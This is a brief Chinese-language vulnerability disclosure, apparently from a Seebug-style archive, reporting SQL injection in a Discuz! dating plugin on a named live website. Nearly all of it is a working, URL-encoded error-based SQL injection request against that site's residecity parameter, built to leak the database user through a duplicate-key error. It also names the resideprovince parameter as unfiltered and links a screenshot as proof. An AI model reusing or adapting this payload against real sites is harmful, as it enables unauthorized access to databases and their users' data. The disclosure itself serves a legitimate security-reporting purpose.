### 简要描述:
Discuz!插件注入漏洞
### 详细说明:
GET
http://www.trueqq.com/jiaoyou.php?mod=search&residecity=%27%20or%20@%60%27%60%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28user%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20or%20@%60%27%60%20and%20%271%27=%271
residecity
resideprovince
参数过滤不严
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201305/0711390392599806a4ef1528c012583ea75878d5.png" alt="QQ截图20130507113841.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/0711390392599806a4ef1528c012583ea75878d5.png)
暂无评论